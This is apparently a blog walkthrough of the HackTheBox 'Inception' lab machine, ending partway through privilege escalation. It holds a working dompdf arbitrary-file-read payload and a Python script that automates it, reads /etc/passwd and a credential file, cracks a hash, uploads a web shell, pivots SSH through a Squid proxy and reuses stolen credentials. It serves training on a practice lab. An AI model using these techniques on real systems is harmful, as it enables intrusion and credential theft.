+ → nmap -sCV -p80,3128 10.10.10.67
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-08 07:56 GMT
+ Nmap scan report for 10.10.10.67
+ Host is up (0.094s latency).
+
+ PORT STATE SERVICE VERSION
+ 80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
+ |_http-server-header: Apache/2.4.18 (Ubuntu)
+ |_http-title: Inception
+ 3128/tcp open http-proxy Squid http proxy 3.5.12
+ |_http-server-header: squid/3.5.12
+ |_http-title: ERROR: The requested URL could not be retrieved
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 43.23 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80 running http so let's use gobuster to enumerate it :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://10.10.10.67
+ ===============================================================
+ Gobuster v3.0.1
+ by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
+ ===============================================================
+ [+] Url: http://10.10.10.67
+ [+] Threads: 10
+ [+] Wordlist: /usr/share/wordlists/dirb/big.txt
+ [+] Status codes: 200,204,301,302,307,401,403
+ [+] User Agent: gobuster/3.0.1
+ [+] Timeout: 10s
+ ===============================================================
+ 2020/03/08 07:56:11 Starting gobuster
+ ===============================================================
+ /.htaccess (Status: 403)
+ /.htpasswd (Status: 403)
+ /assets (Status: 301)
+ /dompdf (Status: 301)
+ /images (Status: 301)
+ Progress: 10069 / 20470 (49.19%)^C
+
+
+` 
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → curl -sk http://10.10.10.67/dompdf/VERSION
+ 0.6.0
+
+
+Now that we know about dompdf's version we run a quick searchsploit command to find publicly available exploits for us :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → searchsploit dompdf 0.6
+ ------------------------------------------------------- ------------------------------
+ Exploit Title | Path
+ | (/usr/share/exploitdb/)
+ ------------------------------------------------------- ------------------------------
+ dompdf 0.6.0 - 'dompdf.php?read' Arbitrary File Read | exploits/php/webapps/33004.txt
+ dompdf 0.6.0 beta1 - Remote File Inclusion | exploits/php/webapps/14851.txt
+ ------------------------------------------------------- ------------------------------
+ Shellcodes: No Result
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Inception]
+ → locate 33004.txt
+ /usr/share/exploitdb/exploits/php/webapps/33004.txt
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Inception]
+ → cp /usr/share/exploitdb/exploits/php/webapps/33004.txt .
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Inception]
+ → nano 33004.txt
+
+
+Looking at the exploit we seem to be able to get arbitrary file read on the dompdf.php file using a psecific string :
+
+
+ http://10.10.10.67/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/etc/passwd
+
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Inception]
+ → curl http://10.10.10.67/dompdf/dompdf.php\?input_file\=php://filter/read\=convert.base64-encode/resource\=/etc/passwd
+ %PDF-1.3
+ 1 0 obj
+ << /Type /Catalog
+ /Outlines 2 0 R
+ /Pages 3 0 R >>
+ endobj
+ 2 0 obj
+ << /Type /Outlines /Count 0 >>
+ endobj
+ 3 0 obj
+ << /Type /Pages
+ /Kids [6 0 R
+ ]
+ /Count 1
+ /Resources <<
+ /ProcSet 4 0 R
+ /Font <<
+ /F1 8 0 R
+ >>
+ >>
+ /MediaBox [0.000 0.000 612.000 792.000]
+ >>
+ endobj
+ 4 0 obj
+ [/PDF /Text ]
+ endobj
+ 5 0 obj
+ <<
+ /Creator (DOMPDF)
+ /CreationDate (D:20200308071455+00'00')
+ /ModDate (D:20200308071455+00'00')
+ >>
+ endobj
+ 6 0 obj
+ << /Type /Page
+ /Parent 3 0 R
+ /Contents 7 0 R
+ >>
+ endobj
+ 7 0 obj
+ <<
+ /Length 1894 >>
+ stream
+
+ 0.000 0.000 0.000 rg
+ BT 34.016 734.579 Td /F1 12.0 Tf [(cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovdXNyL3NiaW4vbm9sb2dpbgpiaW46eDoyOjI6YmluOi9iaW46L3Vzci9zYmluL25vbG9naW4Kc3lzOng6MzozOnN5czovZGV2Oi91c3Ivc2Jpbi9ub2xvZ2luCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2JpbjovYmluL3N5bmMKZ2FtZXM6eDo1OjYwOmdhbWVzOi91c3IvZ2FtZXM6L3Vzci9zYmluL25vbG9naW4KbWFuOng6NjoxMjptYW46L3Zhci9jYWNoZS9tYW46L3Vzci9zYmluL25vbG9naW4KbHA6eDo3Ojc6bHA6L3Zhci9zcG9vbC9scGQ6L3Vzci9zYmluL25vbG9naW4KbWFpbDp4Ojg6ODptYWlsOi92YXIvbWFpbDovdXNyL3NiaW4vbm9sb2dpbgpuZXdzOng6OTo5Om5ld3M6L3Zhci9zcG9vbC9uZXdzOi91c3Ivc2Jpbi9ub2xvZ2luCnV1Y3A6eDoxMDoxMDp1dWNwOi92YXIvc3Bvb2wvdXVjcDovdXNyL3NiaW4vbm9sb2dpbgpwcm94eTp4OjEzOjEzOnByb3h5Oi9iaW46L3Vzci9zYmluL25vbG9naW4Kd3d3LWRhdGE6eDozMzozMzp3d3ctZGF0YTovdmFyL3d3dzovdXNyL3NiaW4vbm9sb2dpbgpiYWNrdXA6eDozNDozNDpiYWNrdXA6L3Zhci9iYWNrdXBzOi91c3Ivc2Jpbi9ub2xvZ2luCmxpc3Q6eDozODozODpNYWlsaW5nIExpc3QgTWFuYWdlcjovdmFyL2xpc3Q6L3Vzci9zYmluL25vbG9naW4KaXJjOng6Mzk6Mzk6aXJjZDovdmFyL3J1bi9pcmNkOi91c3Ivc2Jpbi9ub2xvZ2luCmduYXRzOng6NDE6NDE6R25hdHMgQnVnLVJlcG9ydGluZyBTeXN0ZW0gKGFkbWluKTovdmFyL2xpYi9nbmF0czovdXNyL3NiaW4vbm9sb2dpbgpub2JvZHk6eDo2NTUzNDo2NTUzNDpub2JvZHk6L25vbmV4aXN0ZW50Oi91c3Ivc2Jpbi9ub2xvZ2luCnN5c3RlbWQtdGltZXN5bmM6eDoxMDA6MTAyOnN5c3RlbWQgVGltZSBTeW5jaHJvbml6YXRpb24sLCw6L3J1bi9zeXN0ZW1kOi9iaW4vZmFsc2UKc3lzdGVtZC1uZXR3b3JrOng6MTAxOjEwMzpzeXN0ZW1kIE5ldHdvcmsgTWFuYWdlbWVudCwsLDovcnVuL3N5c3RlbWQvbmV0aWY6L2Jpbi9mYWxzZQpzeXN0ZW1kLXJlc29sdmU6eDoxMDI6MTA0OnN5c3RlbWQgUmVzb2x2ZXIsLCw6L3J1bi9zeXN0ZW1kL3Jlc29sdmU6L2Jpbi9mYWxzZQpzeXN0ZW1kLWJ1cy1wcm94eTp4OjEwMzoxMDU6c3lzdGVtZCBCdXMgUHJveHksLCw6L3J1bi9zeXN0ZW1kOi9iaW4vZmFsc2UKc3lzbG9nOng6MTA0OjEwODo6L2hvbWUvc3lzbG9nOi9iaW4vZmFsc2UKX2FwdDp4OjEwNTo2NTUzNDo6L25vbmV4aXN0ZW50Oi9iaW4vZmFsc2UKc3NoZDp4OjEwNjo2NTUzNDo6L3Zhci9ydW4vc3NoZDovdXNyL3NiaW4vbm9sb2dpbgpjb2JiOng6MTAwMDoxMDAwOjovaG9tZS9jb2JiOi9iaW4vYmFzaAo=)] TJ ET
+ endstream
+ endobj
+ 8 0 obj
+ << /Type /Font
+ /Subtype /Type1
+ /Name /F1
+ /BaseFont /Times-Roman
+ /Encoding /WinAnsiEncoding
+ >>
+ endobj
+ xref
+ 0 9
+ 0000000000 65535 f
+ 0000000008 00000 n
+ 0000000073 00000 n
+ 0000000119 00000 n
+ 0000000273 00000 n
+ 0000000302 00000 n
+ 0000000416 00000 n
+ 0000000479 00000 n
+ 0000002425 00000 n
+ trailer
+ <<
+ /Size 9
+ /Root 1 0 R
+ /Info 5 0 R
+ >>
+ startxref
+ 2535
+ %%EOF
+
+
+
+Decoding the base64 string using **echo 'b64string' | base64 -d** we get the contents of /etc/passwd:
+
+
+ root:x:0:0:root:/root:/bin/bash
+ daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+ bin:x:2:2:bin:/bin:/usr/sbin/nologin
+ sys:x:3:3:sys:/dev:/usr/sbin/nologin
+ sync:x:4:65534:sync:/bin:/bin/sync
+ games:x:5:60:games:/usr/games:/usr/sbin/nologin
+ man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+ lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+ mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+ news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+ uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+ proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+ www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+ backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+ list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+ irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
+ gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+ nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+ systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
+ systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
+ systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
+ systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
+ syslog:x:104:108::/home/syslog:/bin/false
+ _apt:x:105:65534::/nonexistent:/bin/false
+ sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin
+ cobb:x:1000:1000::/home/cobb:/bin/bash
+
+
+As you can see, this can be long and tedious to trim the excessive amount of data to then decode a b64 string. so we'll use [absolobomb's](https://www.absolomb.com/2018-04-14-HackTheBox-Inception/) python script to speed it up :
+
+
+ #!/usr/bin/env python3
+ import base64
+ import urllib.request
+ import argparse
+
+ parser = argparse.ArgumentParser()
+ parser.add_argument("file")
+ args = parser.parse_args()
+
+
+ url = 'http://10.10.10.67/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource='
+
+ try:
+ req = urllib.request.urlopen(url + args.file)
+
+ output = req.read()
+
+ if output:
+ string = output.decode()
+ result = string[string.find("[(")+2:string.find(")]")]
+ decoded = base64.b64decode(result).decode('utf8')
+ print(decoded)
+
+ except urllib.error.HTTPError:
+ print("File cannot be downloaded")
+
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Inception]
+ → nano absolobomb_rocks.py
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Inception]
+ → chmod +x absolobomb_rocks.py
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Inception]
+ → ./absolobomb_rocks.py /etc/passwd
+ root:x:0:0:root:/root:/bin/bash
+ daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+ bin:x:2:2:bin:/bin:/usr/sbin/nologin
+ sys:x:3:3:sys:/dev:/usr/sbin/nologin
+ sync:x:4:65534:sync:/bin:/bin/sync
+ games:x:5:60:games:/usr/games:/usr/sbin/nologin
+ man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+ lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+ mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+ news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+ uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+ proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+ www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+ backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+ list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+ irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
+ gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+ nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+ systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
+ systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
+ systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
+ systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
+ syslog:x:104:108::/home/syslog:/bin/false
+ _apt:x:105:65534::/nonexistent:/bin/false
+ sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin
+ cobb:x:1000:1000::/home/cobb:/bin/bash
+
+
+
+Since we are on an apache2 website, let's try and print out it's default configuration:
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Inception]
+ → ./absolobomb_rocks.py /etc/apache2/sites-enabled/000-default.conf
+ <****VirtualHost *:80>
+ # The ServerName directive sets the request scheme, hostname and port that
+ # the server uses to identify itself. This is used when creating
+ # redirection URLs. In the context of virtual hosts, the ServerName
+ # specifies what hostname must appear in the request's Host: header to
+ # match this virtual host. For the default virtual host (this file) this
+ # value is not decisive as it is used as a last resort host regardless.
+ # However, you must set it for any further virtual host explicitly.
+ #ServerName www.example.com
+
+ ServerAdmin webmaster@localhost
+ DocumentRoot /var/www/html
+
+ # Available loglevels: trace8, ..., trace1, debug, info, notice, warn,
+ # error, crit, alert, emerg.
+ # It is also possible to configure the loglevel for particular
+ # modules, e.g.
+ #LogLevel info ssl:warn
+
+ ErrorLog ${APACHE_LOG_DIR}/error.log
+ CustomLog ${APACHE_LOG_DIR}/access.log combined
+
+ # For most configuration files from conf-available/, which are
+ # enabled or disabled at a global level, it is possible to
+ # include a line for only one particular virtual host. For example the
+ # following line enables the CGI configuration for this host only
+ # after it has been globally disabled with "a2disconf".
+ #Include conf-available/serve-cgi-bin.conf
+ Alias /webdav_test_inception /var/www/html/webdav_test_inception <****Location /webdav_test_inception>
+ Options FollowSymLinks
+ DAV On
+ AuthType Basic
+ AuthName "webdav test credential"
+ AuthUserFile /var/www/html/webdav_test_inception/webdav.passwd
+ Require valid-user <****/Location> <****/VirtualHost>
+
+ # vim: syntax=apache ts=4 sw=4 sts=4 sr noet
+
+From this configuration file we see a path to the webdav directory, so let's go and grab the passwd file :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Inception]
+ → ./absolobomb_rocks.py /var/www/html/webdav_test_inception/webdav.passwd
+ webdav_tester:$apr1$8rO7Smi4$yqn7H.GvJFtsTou1a7VME0
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Inception]
+ → hash-identifier
+ #########################################################################
+ # __ __ __ ______ _____ #
+ # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
+ # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
+ # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
+ # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
+ # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
+ # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
+ # By Zion3R #
+ # www.Blackploit.com #
+ # Root@Blackploit.com #
+ #########################################################################
+ --------------------------------------------------
+ HASH: $apr1$8rO7Smi4$yqn7H.GvJFtsTou1a7VME0
+
+ Possible Hashs:
+ [+] MD5(APR)
+
+
+According to Hash-Identifier the hash we found is MD5.
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Inception]
+ → ./absolobomb_rocks.py /var/www/html/webdav_test_inception/webdav.passwd > inception.txt
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Inception]
+ → hashcat -m 1600 -a 0 inception.txt /usr/share/wordlists/rockyou.txt
+ hashcat (v5.1.0) starting...
+
+ Dictionary cache hit:
+ * Filename..: .\rockyou.txt
+ * Passwords.: 14343296
+ * Bytes.....: 139921497
+ * Keyspace..: 14343296
+
+ $apr1$8rO7Smi4$yqn7H.GvJFtsTou1a7VME0:babygurl69
+
+
+And using rockyou.txt we found the password **babygurl69**. For this next part we will upload [phpbash](https://github.com/Arrexel/phpbash) which is a semi-interactive webshell made by [Arrexel](https://app.hackthebox.eu/profile/2904) which we already encountered on a previous box named [Bashed](https://blog.nowhere.moe/htb/easy/15). We will upload it using the credentials we found with cadaver :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Inception]
+ → cadaver http://10.10.10.67/webdav_test_inception/
+ Authentication required for webdav test credential on server `10.10.10.67':
+ Username: webdav_tester
+ Password:
+ dav:/webdav_test_inception/> put phpbash.php
+ Uploading phpbash.php to `/webdav_test_inception/phpbash.php':
+ Progress: [=============================>] 100.0% of 11251 bytes succeeded.
+ dav:/webdav_test_inception/>
+
+
+So we browse to our phpbash shell at _http://10.10.10.67/webdav_test_inception/phpbash.php_
+
+
+
+
+ www-data@Inception
+ :/var/www/html/webdav_test_inception# ls
+
+ phpbash.php
+ webdav.passwd
+ www-data@Inception
+ :/var/www/html/webdav_test_inception# cd ..
+
+ www-data@Inception
+ :/var/www/html# ls
+
+ LICENSE.txt
+ README.txt
+ assets
+ dompdf
+ images
+ index.html
+ latest.tar.gz
+ webdav_test_inception
+ wordpress_4.8.3
+ www-data@Inception
+ :/var/www/html# cd wordpress_4.8.3
+
+ www-data@Inception
+ :/var/www/html/wordpress_4.8.3# ls
+
+ phpbash.php
+ webdav.passwd
+
+
+we are logged in as www-data so let's see if we can print out user.txt :
+
+
+ www-data@Inception
+ :/var/www/html/wordpress_4.8.3# id
+
+ uid=33(www-data) gid=33(www-data) groups=33(www-data)
+ www-data@Inception
+ :/var/www/html/wordpress_4.8.3# cd /home
+
+ www-data@Inception
+ :/home# ls
+
+ cobb
+ www-data@Inception
+ :/home# cd cobb
+
+ www-data@Inception
+ :/home/cobb# ls
+
+ user.txt
+ www-data@Inception
+ :/home/cobb# cat user.txt
+
+ cat: user.txt: Permission denied
+
+
+And we get permission denied so we need to find a way to privesc to the cobb user. Looking into /var/www/html/wordpress_4.8.3 we print out the contents of wp-config.php :
+
+
+ www-data@Inception:/var/www/html/wordpress_4.8.3# cat wp-config.php
+
+ /**
+ * The base configuration for WordPress
+ *
+ * The wp-config.php creation script uses this file during the
+ * installation. You don't have to use the web site, you can
+ * copy this file to "wp-config.php" and fill in the values.
+ *
+ * This file contains the following configurations:
+ *
+ * * MySQL settings
+ * * Secret keys
+ * * Database table prefix
+ * * ABSPATH
+ *
+ * @link https://codex.wordpress.org/Editing_wp-config.php
+ *
+ * @package WordPress
+ */
+
+ // ** MySQL settings - You can get this info from your web host ** //
+ /** The name of the database for WordPress */
+ define('DB_NAME', 'wordpress');
+
+ /** MySQL database username */
+ define('DB_USER', 'root');
+
+ /** MySQL database password */
+ define('DB_PASSWORD', 'VwPddNh7xMZyDQoByQL4');
+
+ /** MySQL hostname */
+ define('DB_HOST', 'localhost');
+
+
+
+And we have credentials : root:VwPddNh7xMZyDQoByQL4 although we can't connect to ssh on the box yet. We already know that the squid proxy allows us to pass traffic through it, so we can try to enumerate the box THROUGH the proxy to see if ssh is open. so we'll use the **squid_pivot_scanning** metasploit module.
+
+
+ msf5 > use auxiliary/scanner/http/squid_pivot_scanning
+
+ msf5 auxiliary(scanner/http/squid_pivot_scanning) > set RPORT 3128
+ RPORT => 3128
+
+ msf5 auxiliary(scanner/http/squid_pivot_scanning) > set RHOSTS 10.10.10.67
+ RHOSTS => 10.10.10.67
+
+ msf5 auxiliary(scanner/http/squid_pivot_scanning) > set RANGE 127.0.0.1
+ RANGE => 127.0.0.1
+
+ msf5 auxiliary(scanner/http/squid_pivot_scanning) > set PORTS 21,80,139,443,445,1433,1521,1723,3389,8080,9100,22
+ PORTS => 21,80,139,443,445,1433,1521,1723,3389,8080,9100,22
+
+ msf5 auxiliary(scanner/http/squid_pivot_scanning) > run
+
+
+Looking at the results :
+
+
+ [+] [10.10.10.67] 127.0.0.1 is alive but 21 is CLOSED
+ [+] [10.10.10.67] 127.0.0.1:22 seems OPEN
+ [+] [10.10.10.67] 127.0.0.1:80 seems OPEN
+ [+] [10.10.10.67] 127.0.0.1 is alive but 139 is CLOSED
+ [+] [10.10.10.67] 127.0.0.1 is alive but 445 is CLOSED
+ [+] [10.10.10.67] 127.0.0.1 is alive but 1433 is CLOSED
+ [+] [10.10.10.67] 127.0.0.1 is alive but 1521 is CLOSED
+ [+] [10.10.10.67] 127.0.0.1 is alive but 1723 is CLOSED
+ [+] [10.10.10.67] 127.0.0.1 is alive but 3389 is CLOSED
+ [+] [10.10.10.67] 127.0.0.1 is alive but 8080 is CLOSED
+ [+] [10.10.10.67] 127.0.0.1 is alive but 9100 is CLOSED
+ [*] Scanned 1 of 1 hosts (100% complete)
+ [*] Auxiliary module execution completed
+
+
+SSH seems to be opened through the proxy, But to get ourselves to access it we need to use corkscrew and edit our local /etc/ssh/ssh_config to add a ProxyCommand.
+
+
+ λ root [ 10.10.14.11/23 ] [nihilist/_HTB/Inception]
+ → echo 'ProxyCommand corkscrew 10.10.10.67 3128 %h %p' >> /etc/ssh/ssh_config
+
+ λ root [ 10.10.14.11/23 ] [nihilist/_HTB/Inception]
+ → ssh cobb@127.0.0.1
+ The authenticity of host '127.0.0.1 ()' can't be established.
+ ECDSA key fingerprint is SHA256:dr5DOURssJH5i8VbjPxvbeM+e2FyMqJ8DGPB/Lcv1Mw.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added '127.0.0.1' (ECDSA) to the list of known hosts.
+ cobb@127.0.0.1's password:
+ Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-101-generic x86_64)
+
+ * Documentation: https://help.ubuntu.com
+ * Management: https://landscape.canonical.com
+ * Support: https://ubuntu.com/advantage
+ Last login: Thu Nov 30 20:06:16 2017 from 127.0.0.1
+
+ cobb@Inception:~$ id
+ uid=1000(cobb) gid=1000(cobb) groups=1000(cobb),27(sudo)
+
+ cobb@Inception:~$ cat user.txt
+ 4aXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it ! we have been able to print out the user flag.
+
+## **Part 3 : Getting Root Access**
+
+In order to gain root privileges on the box it is very straightforward, but that's not an easy box as you can see :
+
+
+ cobb@Inception:~$ sudo -l
+ [sudo] password for cobb:
+ Matching Defaults entries for cobb on Inception:
+ env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
+
+ User cobb may run the following commands on Inception:
+ (ALL : ALL) ALL
+
+
+Running sudo -l we see that we are able to run /bin/bash as sudo to privesc immediately, so let's do it :
+
+
+ cobb@Inception:~$ sudo bash
+ root@Inception:~# id
+ uid=0(root) gid=0(root) groups=0(root)
+ root@Inception:~# cat /root/root.txt
+ You're waiting for a train. A train that will take you far away. Wake up to find root.txt.
+
+
+And we became root ! But our root flag isn't there , so let's check out which ports are opened from within the box :
+
+
+ root@Inception:~# netstat -ant
+ Active Internet connections (servers and established)
+ Proto Recv-Q Send-Q Local Address Foreign Address State
+ tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
+ tcp 0 0 127.0.0.1:22 127.0.0.1:48514 ESTABLISHED
+ tcp 0 0 127.0.0.1:48514 127.0.0.1:22 ESTABLISHED
+ tcp6 0 0 :::80 :::* LISTEN
+ tcp6 0 0 :::22 :::* LISTEN
+ tcp6 0 0 :::3128 :::* LISTEN
+ tcp6 0 556 192.168.0.10:3128 192.168.0.1:59898 ESTABLISHED
+
+ root@Inception:~# which nc
+ /bin/nc
+
+ root@Inception:~# nc -zv 192.168.0.1 1-65535 2>&1 | grep -v "refused"
+ Connection to 192.168.0.1 21 port [tcp/ftp] succeeded!
+ Connection to 192.168.0.1 22 port [tcp/ssh] succeeded!
+ Connection to 192.168.0.1 53 port [tcp/domain] succeeded!
+
+
+Looking at the output of the netstat command we see that we have another local ip address to work with : **192.168.0.1** So we use the netcat binary on the machine to scan it's opened ports and we find the ftp port opened , checking it out :
+
+
+ root@Inception:~# ftp 192.168.0.1
+ Connected to 192.168.0.1.
+ 220 (vsFTPd 3.0.3)
+ Name (192.168.0.1:cobb): anonymous
+ 331 Please specify the password.
+ Password:
+ 230 Login successful.
+ Remote system type is UNIX.
+ Using binary mode to transfer files.
+ ftp> ls
+ 200 PORT command successful. Consider using PASV.
+ 150 Here comes the directory listing.
+ drwxr-xr-x 2 0 0 4096 Nov 30 2017 bin
+ drwxr-xr-x 3 0 0 4096 Nov 30 2017 boot
+ drwxr-xr-x 19 0 0 3920 Mar 08 06:47 dev
+ drwxr-xr-x 93 0 0 4096 Nov 30 2017 etc
+ drwxr-xr-x 2 0 0 4096 Nov 06 2017 home
+ lrwxrwxrwx 1 0 0 33 Nov 30 2017 initrd.img -> boot/initrd.img-4.4.0-101-generic
+ lrwxrwxrwx 1 0 0 32 Nov 06 2017 initrd.img.old -> boot/initrd.img-4.4.0-98-generic
+ drwxr-xr-x 22 0 0 4096 Nov 30 2017 lib
+ drwxr-xr-x 2 0 0 4096 Oct 30 2017 lib64
+ drwx------ 2 0 0 16384 Oct 30 2017 lost+found
+ drwxr-xr-x 3 0 0 4096 Oct 30 2017 media
+ drwxr-xr-x 2 0 0 4096 Aug 01 2017 mnt
+ drwxr-xr-x 2 0 0 4096 Aug 01 2017 opt
+ dr-xr-xr-x 205 0 0 0 Mar 08 06:47 proc
+ drwx------ 6 0 0 4096 Nov 08 2017 root
+ drwxr-xr-x 26 0 0 920 Mar 08 06:47 run
+ drwxr-xr-x 2 0 0 12288 Nov 30 2017 sbin
+ drwxr-xr-x 2 0 0 4096 Apr 29 2017 snap
+ drwxr-xr-x 3 0 0 4096 Nov 06 2017 srv
+ dr-xr-xr-x 13 0 0 0 Mar 08 06:47 sys
+ drwxrwxrwt 10 0 0 4096 Mar 08 08:30 tmp
+ drwxr-xr-x 10 0 0 4096 Oct 30 2017 usr
+ drwxr-xr-x 13 0 0 4096 Oct 30 2017 var
+ lrwxrwxrwx 1 0 0 30 Nov 30 2017 vmlinuz -> boot/vmlinuz-4.4.0-101-generic
+ lrwxrwxrwx 1 0 0 29 Nov 06 2017 vmlinuz.old -> boot/vmlinuz-4.4.0-98-generic
+
+
+Once logged in as anonymous , we find the crontab file :
+
+
+ ftp> cd /etc
+ 250 Directory successfully changed.
+
+ ftp> get crontab
+ local: crontab remote: crontab
+ 200 PORT command successful. Consider using PASV.
+ 150 Opening BINARY mode data connection for crontab (826 bytes).
+ 226 Transfer complete.
+ 826 bytes received in 0.00 secs (4.3046 MB/s)
+
+
+
+
+So we copy 192.168.0.1's crontab file into 10.10.10.67, to examine it :
+
+
+ ftp> exit
+ 221 Goodbye.
+ root@Inception:~# cat crontab
+ # /etc/crontab: system-wide crontab
+ # Unlike any other crontab you don't have to run the `crontab'
+ # command to install the new version when you edit this file
+ # and files in /etc/cron.d. These files also have username fields,
+ # that none of the other crontabs do.
+
+ SHELL=/bin/sh
+ PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
+
+ # m h dom mon dow user command
+ 17 * * * * root cd / && run-parts --report /etc/cron.hourly
+ 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
+ 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
+ 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
+ */5 * * * * root apt update 2>&1 >/var/log/apt/custom.log
+ 30 23 * * * root apt upgrade -y 2>&1 >/dev/null
+
+
+Looking at what we have here, we see that every 5 minutes apt update is running. What's important here is that we are able to run commands everytime apt-update runs by placing our file inside /etc/apt/apt.conf.d/
+
+
+ root@Inception:~# ssh-keygen
+ Generating public/private rsa key pair.
+ Enter file in which to save the key (/root/.ssh/id_rsa):
+ Created directory '/root/.ssh'.
+ Enter passphrase (empty for no passphrase):
+ Enter same passphrase again:
+ Your identification has been saved in /root/.ssh/id_rsa.
+ Your public key has been saved in /root/.ssh/id_rsa.pub.
+ The key fingerprint is:
+ SHA256:Qm6bKYD4Jeq/STACtAJFV4D/PdwvPV6owjoUtFA5uT8 root@Inception
+ The key's randomart image is:
+ +---[RSA 2048]----+
+ |.+o.o+oo |
+ |o o.. = |
+ |o. . o.+ |
+ |+. .o+ |
+ |+oo ..+=S. |
+ |.oo+ .o=E . . |
+ |. ....+. o o. . |
+ |. . ... o ..+. |
+ | ..+. .o ..o.. |
+ +----[SHA256]-----+
+
+
+
+So first we generate a ssh key inside 10.10.10.67 to then put it into 192.168.0.1's /root/.ssh/authorized_keys
+
+
+ root@Inception:~# ftp 192.168.0.1
+ Connected to 192.168.0.1.
+ 220 (vsFTPd 3.0.3)
+ Name (192.168.0.1:cobb): anonymous
+ 331 Please specify the password.
+ Password:
+ 230 Login successful.
+ Remote system type is UNIX.
+ Using binary mode to transfer files.
+ ftp> put /root/.ssh/id_rsa.pub /root/.ssh/authorized_keys
+ local: /root/.ssh/id_rsa.pub remote: /root/.ssh/authorized_keys
+ 200 PORT command successful. Consider using PASV.
+ 550 Permission denied.
+ ftp> exit
+ 221 Goodbye.
+
+
+Didn't work, that's because we need to use tftp instead of ftp:
+
+
